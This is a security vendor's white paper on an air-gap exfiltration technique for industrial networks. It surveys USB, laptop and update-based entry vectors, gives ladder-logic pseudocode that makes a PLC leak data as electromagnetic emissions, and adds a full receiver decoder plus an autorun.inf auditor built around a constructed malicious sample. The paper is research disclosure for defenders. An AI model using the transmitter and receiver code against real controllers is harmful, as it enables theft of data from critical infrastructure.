Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks
White Paper: Exfiltrating Reconnaissance data from Air-Gapped ICS/SCADA Networks
David Atch, George Lashenko and Tal Kaminker
Table of Contents
- Introduction
- Attack vectors for industrial networks
- Scenario: Malicious USB
- Scenario: External engineering laptop
- Scenario: Malicious updates
- Data exfiltration
- Ladder Logic
- Generate low radio frequency
- Exfiltration Ladder Logic
- PLC Frequency Detection Tool
- Optimal frequency detection
- Synchronization Detection
- Receiving data
- Bios
- About CyberX
Introduction

For years, best practice for industrial and critical-infrastructure networks has been to separate the IT and OT networks. Many companies still rely on this separation as their main security measure, sometimes combined with further security layers and sometimes with nothing at all. Relying on the air gap alone is not enough, and in this research we show why.

One of the challenges in bypassing an air gap is the need for a data channel to exfiltrate the data collected inside the isolated network. We demonstrate how an attacker who has obtained access to the network by some means, whether through a USB device shared between networks or an infected technician's laptop connected to the air-gapped network, can establish a data channel across the air gap. Data worth sending out includes a map of the network, a map of the security products in use, and the ladder logic of the controllers (needed if malicious code is to be hot-patched into them).

We exfiltrate data by generating low radio frequencies from a PLC that has no built-in radio transmitter, using specially crafted ladder logic.
Attack vectors for industrial networks

An air gap is a security measure used by OT network owners to separate their network from the internet and reduce the risk of infection by generic, non-targeted malware. Whether disconnecting an operational network from the internet really is a security measure is widely debated; this research does not try to answer that question and simply assumes the operational network is air gapped.

Attacking an operational network requires multiple stages and specially crafted malware. Before attackers can achieve their goal, whether espionage or physical damage, they need to execute a reconnaissance stage. Reconnaissance is an essential part of any targeted attack and is even more crucial in industrial networks, because OT networks contain a diversity of vendors, equipment and protocols. To harm industrial equipment the attacker needs specific knowledge of the device and of the ladder logic (PLC program) it runs, and with so many vendors, reconnaissance in OT networks is a must. This paper focuses on that stage.

The following scenarios are ways into an air-gapped network. In each of them the attack drops a tool that acts as a scanner/collector whose purpose is to bring home all the interesting data about the network:
- Network device mapping
- Security product mapping
- Device types and firmware versions
- Ladder logic programs
- Schematics and design documents, to determine each device's importance
- Overall working patterns of the users and devices

Scenario: Malicious USB

This scenario uses an infected USB drive to infect the air-gapped network. The drive might belong to one of the engineers and become infected on a PC connected to the internet, or it might be carried in by someone paid to connect it to the air-gapped network.
Air-gapped networks are hard to patch because they lack an internet connection, and OT networks are harder still because patching requires downtime of network components, which may make the OT network inoperable and translate into financial loss. OT networks also run outdated and unsupported operating systems. The auto-spreading USB mechanisms below are therefore likely to work:
- autorun.inf: enabled by default on Windows XP (Microsoft disabled AutoRun for non-optical media in Windows 7 and, through update KB971029, on earlier versions). A text file placed on the drive names an executable to run when the drive is inserted. Widely used by malware.
- LNK exploits: multiple vulnerabilities in the shortcut (LNK) format cause code to execute as soon as the directory containing the shortcut is browsed. Used by Stuxnet against air-gapped OT networks.
- DLL search-order hijacking: the current working directory is part of Windows' default DLL search order, so an application vulnerable to this may load a DLL planted on the USB drive.
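The autorun.inf mechanism above is easy to audit on a drive before it crosses into the OT network. The following is an added example, not code from the paper: it parses the [autorun] section and reports every directive that launches a program on insertion or through a shell verb (open, shellexecute, shell\<verb>\command), and flags double-extension names such as Report.pdf.exe. The sample file and the extension list are constructed for this example.

```python
"""Audit an autorun.inf for directives that would execute code on insertion.
Added example; the sample autorun.inf below is constructed, not captured."""
import configparser
import ntpath

# Extensions Windows executes directly (assumption: illustrative, not exhaustive)
EXEC_EXT = {".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js", ".dll"}
LAUNCH_KEYS = ("open", "shellexecute")

# Constructed sample modelled on the autorun.inf pattern malware uses on USB drives
SAMPLE_AUTORUN = """[AutoRun]
open=setup.exe
shellexecute=Docs\\Report.pdf.exe
shell\\explore\\command=rundll32.exe sys.dll,Launch
icon=%SystemRoot%\\system32\\SHELL32.dll,4
action=Open folder to view files
label=ENGINEERING
"""


def audit_autorun(text):
    """Return a list of (directive, value, reason) findings for one autorun.inf."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",), comment_prefixes=(";",))
    cp.optionxform = str.lower            # autorun.inf keys are case-insensitive
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if section.lower() != "autorun":  # section name is case-insensitive too
            continue
        for key, value in cp.items(section):
            value = value.strip()
            # first token is the program to run, the rest are its arguments
            program = value.strip('"').split()[0] if value else ""
            name = ntpath.basename(program)
            launches = key in LAUNCH_KEYS or (
                key.startswith("shell\\") and key.endswith("\\command"))
            if launches:
                findings.append((key, value, "launches a program on insertion or shell verb"))
            if name.count(".") >= 2 and ntpath.splitext(name)[1].lower() in EXEC_EXT:
                findings.append((key, value, "double extension hides an executable"))
    return findings


if __name__ == "__main__":
    for key, value, reason in audit_autorun(SAMPLE_AUTORUN):
        print(f"{key:24s} {value:40s} {reason}")
```

A benign autorun.inf that only sets label and icon produces no findings; anything that sets open, shellexecute or a shell verb command is exactly the behaviour the scenario relies on and should be quarantined together with the referenced file.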
Scenario: External engineering laptop

Many OT network owners bring in external engineers to program their software and controllers, and some of these engineers use the same laptops to connect to the internet. If an engineer's laptop is infected with malware, it may infect the air-gapped network as soon as it is connected. Again, this is highly likely because of the lack of security updates in air-gapped networks.

Scenario: Malicious updates

This scenario is based on past events in which software vendors were explicitly targeted. The attackers infect the main distribution of the software or its updates, which is extremely hard to detect, and some OT vendors do not even digitally sign their updates and software. Such attacks have been seen in NotPetya, which spread through the update mechanism of financial (accounting) software, and in Dragonfly, which trojanized the software of industrial vendors.

Data Exfiltration

A key aspect of the reconnaissance stage is data exfiltration: to analyze the collected data the attacker has to bring it back. Most available methods require the malicious USB drive or the infected laptop to connect to the network again, which can take a long time, and during that time the reconnaissance tool might be discovered and terminated. We propose a new way of exfiltrating data: inject ladder logic into a PLC and use the PLC as a low-frequency radio transmitter.

Ladder Logic

Ladder logic is the program that runs on a PLC; it processes inputs from the various I/O devices connected to the PLC. At a very high level a PLC consists of the following layers:

Hardware: the components the PLC is built from. It is really similar to a regular PC and contains RAM, a CPU and storage.
Storage: holds the PLC's operating system and the ladder logic bytecode itself.
Firmware: the PLC's operating system, which interacts with the hardware components and executes the ladder logic bytecode.
Ladder Logic: usually written in a standard PLC language such as STL (Statement List, an assembly-like textual language) or FBD (Function Block Diagram, a graphical representation of the same logic), compiled to bytecode by the vendor's programming software and executed by the PLC.

Ladder logic has progressed over the years; today it is more than a language for interacting with I/O components and also offers API functions such as socket send/recv. This gives the ladder logic developer much more power: previous research (PLC-Blaster) showed that ladder logic can act as a worm and a network scanner.

A ladder logic program is organized in blocks. The main block types (Siemens S7 terminology) are:
- FC: regular functions
- FB: function blocks, like functions but with their own storage to keep state between calls
- DB: data blocks, which store the variables of the program
- OB: organization blocks, which execute cyclically, on a fixed period, or in reaction to some trigger
The basic building block of a ladder logic program is the rung: a row of input conditions on the left that, when satisfied, energizes the output on the right, the equivalent of an if-statement in textual code. An average ladder logic program contains tens of rungs split among different OB, FB and FC blocks. Rungs are evaluated in order on every scan cycle, so fast that they appear to execute simultaneously; rungs written in the main OB run cyclically all the time, while other OBs can be configured to run in reaction to an event or every x seconds using a timer.
Generate low radio frequency

Our work on generating low radio frequencies builds on the NSA's TEMPEST research, which shows how electrically powered devices emit radio frequencies from which data can be recovered. We tried several things to make the PLC emit a controllable signal using only ladder logic and no radio transmitter:
- Execute heavy calculations to raise the CPU's power draw. Produced nothing: the PLC is always executing code and using the CPU, whether it is calculating something or idling.
- Connect and disconnect an RJ45 cable from the onboard Ethernet port, assuming the network interface would emit EM. The PLC did shift its emission, but this requires physical access and is impractical for exfiltration.
- Send and receive network traffic. Produced nothing.
- Use the ladder logic to write values to memory. Produced a shift in the EM spectrum, because writing to memory drives current over the bus to the memory chip.

[Figure: spectrogram of the idle PLC; strongest component around 363 Hz, visible at several frequencies]
[Figure: spectrogram while memory is being written; every shift in the spectrum corresponds to a memory block being written]
Exfiltration Ladder Logic

Once we could control the frequency shift we had a way to encode data; from there we had to develop a protocol for one-way transmission. We wrote our ladder logic in OB blocks so that it executes alongside whatever ladder logic is already present on the device. The program is designed as a state machine whose state variable is advanced every second by an OB configured to run once a second. The states are:
1. Initialization state
   a. All variables are set to their initial values.
   b. On completion, move to state 2.
2. Synchronization state
   a. Transmits a special synchronization sequence.
   b. In the current implementation it lasts 10 seconds; this can be changed to match transmission quality (a longer sequence slows the transmission but allows detection when the signal is less clear).
   c. The synchronization sequence is a simple alternating sequence.
   d. On completion, move to state 3.
3. Data transmission state
   a. The data to transmit resides in an array.
   b. One bit is transmitted per second; this is configurable and should be set according to the signal strength.
   c. On completion, move back to state 1.
Pseudocode of the transmitter (Python stands in for the ladder logic; the two loops of the original are the bodies of the two OBs):

```python
# In the PLC this is split across two OBs: the main cyclic OB runs main() on
# every scan, and a cyclic-interrupt OB runs counter_advancement() once a second.
SYNC_START, SYNC_END = 0, 10    # 10 s synchronization sequence
DATA_END = 60                   # state wraps at 60, so 50 data bits per cycle

state = 0
data_arr = bytearray(64)        # filled by the reconnaissance tool
dummy_src = bytearray(10000)
dummy_dst = bytearray(10000)
dummy_var = 1


def send_bit(bit):
    """Controls the current frequency: a 10 KB memory move shifts the EM
    signature (bit 1); a register-only multiplication leaves it idle (bit 0).
    The rest of the program manipulates `bit` to encode data."""
    global dummy_var
    if bit == 1:
        dummy_dst[:] = dummy_src                 # memmove(dummy_dst, dummy_src, 10000)
    else:
        dummy_var = (dummy_var * 123) & 0xFFFF


def sync():
    """Sync pattern the listening side detects: 1,0,1,0,... for the sync states."""
    send_bit(1 if state % 2 == 0 else 0)


def extract_cur_bit():
    """Current bit of the global array, selected by the state (LSB first).
    The paper's text speaks of 5 bits per character; its pseudocode, followed
    here, indexes by 8. Because the state wraps at 60, each cycle restarts at
    data_arr[0]; a larger buffer needs a chunk offset advanced on wrap."""
    i = state - SYNC_END
    return (data_arr[i // 8] >> (i % 8)) & 1


def main():
    """Body of the main cyclic OB, executed on every PLC scan."""
    if SYNC_START <= state < SYNC_END:
        sync()
    elif SYNC_END <= state < DATA_END:
        send_bit(extract_cur_bit())


def counter_advancement():
    """Body of the 1 s cyclic-interrupt OB: advance the state machine."""
    global state
    state = (state + 1) % DATA_END
```
PLC Frequency Detection Tool

The PLC's ladder logic transmits the data cyclically all the time. On the receiving side we need code that will:
- Detect the optimal frequency from which to extract the data. The PLC signal is visible across a range of frequencies, and a nearby electrical device may cause interference on some of them.
- Synchronize itself to the PLC's clock. The PLC sends one bit per second, but the receiver has no information about the device's clock: when one symbol ends and the next begins. The sync sequence is used to determine the clock ticks and to know when the data begins.
- Receive the data bit by bit and rebuild words. Once synchronized to the PLC's clock, the receiver knows when each bit begins and ends.

Pipeline: Detect Optimal Frequency -> Sync -> Receive Data
Optimal frequency detection

The PLC-controlled shifts repeat across a certain sub-spectrum, but some frequencies are easier to work with than others, because:
- A nearby device may cause constant interference
- Some frequencies simply carry more noise
- Some frequencies carry a stronger signal
At this stage we want to find the optimal frequency to work with:
1. Extract the candidate sub-spectrum, given here as [350 Khz, 420 Hz]; the units as printed are inconsistent, and the idle-spectrum peak reported above is quoted at 363 Hz.
2. Correlate the spectrum with a basic pattern of the synchronization block, drawn as an image: purple is 1 (bright), yellow is -1 (dark), green is 0 (don't care).
3. Pick the frequency with the highest correlation, making sure it exceeds a threshold.
4. The correlation is especially significant during a sync.
Synchronization Detection

At this stage we work with the single frequency found optimal in the previous stage. We now want to detect the sync pattern, which is a pattern of dark / light. We focus on one side of the optimal frequency, which leaves a simple decision: do we see a light or a dark pattern? We shrink along the frequency (y) axis by averaging each column, which turns the image into a one-dimensional vector of brightness over time.
Again we use correlation, this time over the one-dimensional brightness vector, and the pattern we look for is dark, light, dark, light, ... The correlation reaches its peak when perfectly aligned with the sync signal. At that point we know the PLC is in its sync state, we are synchronized to the PLC's clock, and the data will start arriving soon.
Receiving Data

Now that we are synchronized to the PLC's clock we receive the actual data: working on the same brightness signal, every second we decide whether the slot carried a 1 or a 0. In the spectrogram the runs of ones and zeros are easy to see. We know the PLC transmits data for a fixed amount of time and then returns to the synchronization state, so we receive data for that same amount of time and then go back to Synchronization Detection to receive the next chunk.
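The three receiver stages above, run end to end against the transmitter's schedule, as an added example that is not the paper's tool. It models the capture as a constructed spectrogram (one row per frequency bin, one column per second) in which a few bins carry the memory-write signature with different gains, one bin is noisy and one is a constantly bright device; all signal levels, noise, bin numbers and the 60-slot frame (10 alternating sync slots, 50 data bits, mirroring the paper's state counter) are assumptions. The receiver removes each bin's mean, correlates it with the sync template to pick the best bin and the sync offset, then thresholds halfway between the sync highs and lows to decode the bits.

```python
"""End-to-end model of the covert channel: transmitter bit schedule, constructed
spectrogram standing in for the SDR capture, and the three receiver stages
(best frequency, sync lock, bit decoding). Added example, not the paper's code."""
import random

SYNC_LEN = 10                          # seconds of 1,0,1,0,... (paper: 10 s)
FRAME_LEN = 60                         # the paper's state counter wraps at 60
DATA_LEN = FRAME_LEN - SYNC_LEN        # 50 data bits per frame
SYNC_TEMPLATE = [1 if i % 2 == 0 else -1 for i in range(SYNC_LEN)]


def frame_bits(payload):
    """Bit emitted at each transmitter state 0..59: even sync slots send 1,
    data bits are taken from the payload LSB-first, missing bytes pad with 0."""
    bits = [1 if s % 2 == 0 else 0 for s in range(SYNC_LEN)]
    for i in range(DATA_LEN):
        byte = payload[i // 8] if i // 8 < len(payload) else 0
        bits.append((byte >> (i % 8)) & 1)
    return bits


def simulate_spectrogram(payload, seconds=150, n_bins=20, phase=17, seed=1):
    """Constructed capture (assumed parameters): bins 5..9 carry the PLC signal
    with different gains, bin 3 is noisy, bin 12 is a constantly bright device."""
    rng = random.Random(seed)
    bits = frame_bits(payload)
    gain = {5: 0.3, 6: 0.6, 7: 1.0, 8: 0.8, 9: 0.4}
    spec = []
    for f in range(n_bins):
        row = []
        for t in range(seconds):
            v = 1.0 + rng.gauss(0, 0.06)                     # background level
            v += gain.get(f, 0.0) * bits[(t + phase) % FRAME_LEN]
            if f == 3:
                v += rng.gauss(0, 0.35)                      # noisy band
            if f == 12:
                v += 3.0                                     # constant emitter
            row.append(v)
        spec.append(row)
    return spec


def correlate(row, start, mean):
    """Correlation of the mean-removed brightness with the sync template."""
    return sum((row[start + i] - mean) * SYNC_TEMPLATE[i] for i in range(SYNC_LEN))


def sync_scan(row):
    """(best correlation, offset) over every start that leaves room for a full frame."""
    mean = sum(row) / len(row)
    return max((correlate(row, s, mean), s) for s in range(len(row) - FRAME_LEN + 1))


def best_frequency(spec):
    """Stage 1: the bin whose strongest sync correlation is highest. A constantly
    bright bin has no correlation once its mean is removed; a noisy bin scores low."""
    return max(range(len(spec)), key=lambda f: sync_scan(spec[f])[0])


def find_sync(row, threshold=2.5):
    """Stage 2: offset where the sync pattern starts; fail if nothing exceeds threshold."""
    score, start = sync_scan(row)
    if score < threshold:
        raise ValueError("no synchronization pattern above threshold")
    return start


def decode_frame(row, start):
    """Stage 3: threshold halfway between the sync highs and lows, pack bits LSB-first."""
    highs = [row[start + i] for i in range(0, SYNC_LEN, 2)]
    lows = [row[start + i] for i in range(1, SYNC_LEN, 2)]
    thr = (sum(highs) / len(highs) + sum(lows) / len(lows)) / 2
    out = bytearray((DATA_LEN + 7) // 8)
    for i in range(DATA_LEN):
        if row[start + SYNC_LEN + i] > thr:
            out[i // 8] |= 1 << (i % 8)
    return bytes(out)


def receive(spec, threshold=2.5):
    """Run the three stages; returns (chosen bin, decoded bytes of one frame)."""
    f = best_frequency(spec)
    start = find_sync(spec[f], threshold)
    return f, decode_frame(spec[f], start)


if __name__ == "__main__":
    capture = simulate_spectrogram(b"Net:10")   # constructed payload
    print(receive(capture))                     # expected: (7, b'Net:10\x00')
```

Two points the simulation makes visible: an alternating sync sequence correlates almost as well two slots early or late, so the data bits adjacent to the sync (and, for a real receiver, a threshold and a longer sync) decide how robust the lock is; and because the transmitter repeats the frame indefinitely, a longer capture can be folded at the frame period to average out noise before the correlation is run.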
Bios

David Atch, VP Research
David is a world-class cybersecurity expert with many years of real-world experience in malware analysis, threat hunting and incident response. He has made multiple submissions to ICS-CERT, including zero-day vulnerabilities in commercial ICS devices [see: search.usa.gov/search?utf8=%e2%9c%93&affiliate=us-cert-cs&query=atch&commit=search], and has tracked malware campaigns targeting critical infrastructure [see: Targeting-Ukrainian]. Before CyberX, David had a military career in the IDF, where he led a team of programmers and reverse engineers who continuously hunted and mitigated complex intrusions targeting the country's critical national infrastructure. He has received multiple awards for technological innovation, and was most recently invited to present at the SANS ICS Security Summit in March. CyberX is a Boston-based industrial cybersecurity company founded in 2013 by IDF cyber experts.

George Lashenko, Security Researcher
An experienced security researcher, George brings to CyberX extensive experience with mathematical algorithms and large-scale software development projects. During more than four years in the Israel Defense Forces (IDF) he served in an elite unit as a software engineer on teams in charge of protecting the IDF's critical infrastructure.

Tal Kaminker, Machine Learning Researcher
Tal is an experienced researcher and developer of algorithms, with broad knowledge of statistical analysis and data modeling. During his military career in the IDF, Tal served in an elite unit responsible for securing the IDF's critical infrastructure and power grid, developing and implementing new algorithms and data res.

About CyberX
CyberX provides the most widely deployed industrial cybersecurity platform for continuously reducing ICS risk.
Supporting all OT vendors and integrating with existing IT security tools, CyberX's platform combines a deep understanding of industrial protocols, devices and applications with ICS-specific asset discovery, continuous monitoring and incident forensics, risk and vulnerability management, automated threat modeling, and threat intelligence. CyberX recently published the first Global ICS & IIoT Risk Report, a DBIR-like analysis of real-world vulnerabilities found in 375 production ICS networks worldwide. CyberX is also the only OT security firm selected for the SINET Innovator Award sponsored by the US DHS and DoD, the only one recognized by the International Society of Automation (ISA), and the only one selected by the Israeli national consortium providing critical infrastructure protection for the Tokyo 2020 Olympics. For more information visit CyberX-Labs.com.
Advanced Persistent Threats and Real-Time Threat Management The Essentials Series Beyond the Hype: Advanced Persistent Threats sponsored by Dan Sullivan Introduction to Realtime Publishers by Don Jones,
More informationHow To Manage Security On A Networked Computer System
Unified Security Reduce the Cost of Compliance Introduction In an effort to achieve a consistent and reliable security program, many organizations have adopted the standard as a key compliance strategy
More informationBLUETOOTH SERIAL PORT PROFILE. iwrap APPLICATION NOTE
BLUETOOTH SERIAL PORT PROFILE iwrap APPLICATION NOTE Thursday, 19 April 2012 Version 1.2 Copyright 2000-2012 Bluegiga Technologies All rights reserved. Bluegiga Technologies assumes no responsibility for
More informationEnd User Devices Security Guidance: Apple ios 8
GOV.UK Guidance End User Devices Security Guidance: Apple ios 8 Published Contents 1. Changes since previous guidance 2. Usage scenario 3. Summary of platform security 4. How the platform can best satisfy
More informationCloud Security Primer MALICIOUS NETWORK COMMUNICATIONS: WHAT ARE YOU OVERLOOKING?
A Cloud Security Primer : WHAT ARE YOU OVERLOOKING? LEGAL DISCLAIMER The information provided herein is for general information and educational purposes only. It is not intended and should not be construed
More informationETHICAL HACKING 010101010101APPLICATIO 00100101010WIRELESS110 00NETWORK1100011000 101001010101011APPLICATION0 1100011010MOBILE0001010 10101MOBILE0001
001011 1100010110 0010110001 010110001 0110001011000 011000101100 010101010101APPLICATIO 0 010WIRELESS110001 10100MOBILE00010100111010 0010NETW110001100001 10101APPLICATION00010 00100101010WIRELESS110
More informationCONTINUOUS DIAGNOSTICS BEGINS WITH REDSEAL
CONTINUOUS DIAGNOSTICS BEGINS WITH REDSEAL WHAT IS CDM? The continuous stream of high profile cybersecurity breaches demonstrates the need to move beyond purely periodic, compliance-based approaches to
More informationRoger W. Kuhn, Jr. Advisory Director Education Fellow Cyber Security Forum Initiative
Roger W. Kuhn, Jr. Advisory Director Education Fellow Cyber Security Forum Initiative November 2014 Disclaimer Current SCADA Vulnerability Factors Industrial Control Systems 101 Proposed Countermeasures
More informationPFP Technology White Paper
PFP Technology White Paper Summary PFP Cybersecurity solution is an intrusion detection solution based on observing tiny patterns on the processor power consumption. PFP is capable of detecting intrusions
More informationAppalachian Regional Commission Evaluation Report. Table of Contents. Results of Evaluation... 1. Areas for Improvement... 2
Report No. 13-35 September 27, 2013 Appalachian Regional Commission Table of Contents Results of Evaluation... 1 Areas for Improvement... 2 Area for Improvement 1: The agency should implement ongoing scanning
More informationSecuring Industrial Control Systems in the Chemical Sector. Roadmap Awareness Initiative Making the Business Case
Securing Industrial Control Systems in the Chemical Sector Roadmap Awareness Initiative Making the Business Case Developed by the Chemical Sector Coordinating Council in partnership with The U.S. Department
More informationICTN 4040. Enterprise Database Security Issues and Solutions
Huff 1 ICTN 4040 Section 001 Enterprise Information Security Enterprise Database Security Issues and Solutions Roger Brenton Huff East Carolina University Huff 2 Abstract This paper will review some of
More informationAnalyzing HTTP/HTTPS Traffic Logs
Advanced Threat Protection Automatic Traffic Log Analysis APTs, advanced malware and zero-day attacks are designed to evade conventional perimeter security defenses. Today, there is wide agreement that
More informationHow To Protect A Web Application From Attack From A Trusted Environment
Standard: Version: Date: Requirement: Author: PCI Data Security Standard (PCI DSS) 1.2 October 2008 6.6 PCI Security Standards Council Information Supplement: Application Reviews and Web Application Firewalls
More informationThe Bus (PCI and PCI-Express)
4 Jan, 2008 The Bus (PCI and PCI-Express) The CPU, memory, disks, and all the other devices in a computer have to be able to communicate and exchange data. The technology that connects them is called the
More informationWho Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence. AIBA Quarterly Meeting September 10, 2015
Who Drives Cybersecurity in Your Business? Milan Patel, K2 Intelligence AIBA Quarterly Meeting September 10, 2015 The Answer 2 Everyone The relationship between the board, C-suite, IT, and compliance leaders
More informationG DATA TechPaper #0275. G DATA Network Monitoring
G DATA TechPaper #0275 G DATA Network Monitoring G DATA Software AG Application Development May 2016 Contents Introduction... 3 1. The benefits of network monitoring... 3 1.1. Availability... 3 1.2. Migration
More informationN-Dimension Solutions Cyber Security for Utilities
AGENDA ITEM NO.: 3.A. MEETING DATE; 08/18/2014 N-Dimension Solutions Cyber Security for Utilities Cyber Security Protection for Critical Infrastructure Assets The cyber threat is escalating - Confidential
More informationBenefits of Machine Learning. with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER
Benefits of Machine Learning with Behavioral Analysis in Detection of Advanced Persistent Threats WHITE PAPER Overview The Evolution of Advanced Persistent Threat Detection Computer viruses have plagued
More informationSymantec Client Management Suite 8.0
IT Flexibility. User Freedom. Data Sheet: Endpoint Management Overview of Symantec Client Management Suite Symantec Client Management Suite automates time-consuming and redundant tasks for deploying, managing,
More informationInternet security: Shutting the doors to keep hackers off your network
Internet security: Shutting the doors to keep hackers off your network A Paralogic Networks Guide www.scholarisintl.com Introduction Like all revolutionary steps in technological development the Internet
More informationServer Based Desktop Virtualization with Mobile Thin Clients
Server Based Desktop Virtualization with Mobile Thin Clients Prof. Sangita Chaudhari Email: sangita123sp@rediffmail.com Amod N. Narvekar Abhishek V. Potnis Pratik J. Patil Email: amod.narvekar@rediffmail.com
More informationMigrating to Windows 7 - A challenge for IT Professionals
I D C T E C H N O L O G Y S P O T L I G H T Migrating to Windows 7? Technology Points to Consider September 2010 Adapted from Worldwide IT Asset Management Software 2009 2013 Forecast and 2008 Vendor Shares
More informationIncident Handling. Applied Risk Management. September 2002
Incident Handling Applied Risk Management September 2002 What is Incident Handling? Incident Handling is the management of Information Security Events What is an Information Security Event? An Information
More informationSAN Conceptual and Design Basics
TECHNICAL NOTE VMware Infrastructure 3 SAN Conceptual and Design Basics VMware ESX Server can be used in conjunction with a SAN (storage area network), a specialized high speed network that connects computer
More informationGFI White Paper PCI-DSS compliance and GFI Software products
White Paper PCI-DSS compliance and Software products The Payment Card Industry Data Standard () compliance is a set of specific security standards developed by the payment brands* to help promote the adoption
More informationOn-Premises DDoS Mitigation for the Enterprise
On-Premises DDoS Mitigation for the Enterprise FIRST LINE OF DEFENSE Pocket Guide The Challenge There is no doubt that cyber-attacks are growing in complexity and sophistication. As a result, a need has
More informationCisco Advanced Malware Protection for Endpoints
Data Sheet Cisco Advanced Malware Protection for Endpoints Product Overview With today s sophisticated malware, you have to protect endpoints before, during, and after attacks. Cisco Advanced Malware Protection
More informationALTIRIS Deployment Solution 6.8 PXE Overview
ALTIRIS Deployment Solution 6.8 PXE Overview Notice Altiris AAA Document 2006 Altiris, Inc. All rights reserved. Document Date: October 3, 2006 Altiris, Inc. is a pioneer of IT lifecycle management software
More informationIDS or IPS? Pocket E-Guide
Pocket E-Guide IDS or IPS? Differences and benefits of intrusion detection and prevention systems Deciding between intrusion detection systems (IDS) and intrusion prevention systems (IPS) is a particularly
More informationDVCrypt Conditional Access System
DVCrypt Conditional Access System Quick start guide 1. Introduction DVCrypt is a conditional access system for digital TV broadcasting networks (DVB). It consists of hardware modules and client/server
More informationInformation Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified
Standard: Data Security Standard (DSS) Requirement: 6.6 Date: February 2008 Information Supplement: Requirement 6.6 Code Reviews and Application Firewalls Clarified Release date: 2008-04-15 General PCI
More informationIntrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks
Intrusion Detection and Cyber Security Monitoring of SCADA and DCS Networks Dale Peterson Director, Network Security Practice Digital Bond, Inc. 1580 Sawgrass Corporate Parkway, Suite 130 Sunrise, FL 33323
More informationCyber Threats Insights from history and current operations. Prepared by Cognitio May 5, 2015
Cyber Threats Insights from history and current operations Prepared by Cognitio May 5, 2015 About Cognitio Cognitio is a strategic consulting and engineering firm led by a team of former senior technology
More informationE-BUSINESS THREATS AND SOLUTIONS
E-BUSINESS THREATS AND SOLUTIONS E-BUSINESS THREATS AND SOLUTIONS E-business has forever revolutionized the way business is done. Retail has now a long way from the days of physical transactions that were
More informationNeelesh Kamkolkar, Product Manager. A Guide to Scaling Tableau Server for Self-Service Analytics
Neelesh Kamkolkar, Product Manager A Guide to Scaling Tableau Server for Self-Service Analytics 2 Many Tableau customers choose to deliver self-service analytics to their entire organization. They strategically
More informationSeven Strategies to Defend ICSs
INTRODUCTION Cyber intrusions into US Critical Infrastructure systems are happening with increased frequency. For many industrial control systems (ICSs), it s not a matter of if an intrusion will take
More informationFirst Look Trend Micro Deep Discovery Inspector
First Look Trend Micro Deep Discovery Inspector By looking for correlations in attack patterns, Trend Micro s Deep Discovery Inspector has the ability to protect networks against customised attacks and
More informationPractical Steps To Securing Process Control Networks
Practical Steps To Securing Process Control Networks Villanova University Seminar Rich Mahler Director, Commercial Cyber Solutions Lockheed Martin Lockheed Martin Corporation 2014. All Rights Reserved.
More informationExecutive Overview...4. Importance to Citizens, Businesses and Government...5. Emergency Management and Preparedness...6
Securing the State Of Michigan Information Technology Resources Table of Contents Executive Overview...4 Importance to Citizens, Businesses and Government...5 Emergency Management and Preparedness...6
More informationComparison of Firewall, Intrusion Prevention and Antivirus Technologies
White Paper Comparison of Firewall, Intrusion Prevention and Antivirus Technologies How each protects the network Juan Pablo Pereira Technical Marketing Manager Juniper Networks, Inc. 1194 North Mathilda
More informationNetwork Monitoring White Paper
Network ing White Paper ImageStream Internet Solutions, Inc. 7900 East 8th Road Plymouth, Indiana 46563 http://www.imagestream.com info@imagestream.com Phone: 574.935.8484 Sales: 800.813.5123 Fax: 574.935.8488
More informationCHAPTER 11: Flip Flops
CHAPTER 11: Flip Flops In this chapter, you will be building the part of the circuit that controls the command sequencing. The required circuit must operate the counter and the memory chip. When the teach
More informationFirst Line of Defense to Protect Critical Infrastructure
RFI SUBMISSION First Line of Defense to Protect Critical Infrastructure Developing a Framework to Improve Critical Infrastructure Cybersecurity Response to NIST Docket # 130208119-3119-01 Document # 2013-044B
More informationebus Player Quick Start Guide
ebus Player Quick Start Guide This guide provides you with the information you need to efficiently set up and start using the ebus Player software application to control your GigE Vision or USB3 Vision
More informationFighting Advanced Threats
Fighting Advanced Threats With FortiOS 5 Introduction In recent years, cybercriminals have repeatedly demonstrated the ability to circumvent network security and cause significant damages to enterprises.
More information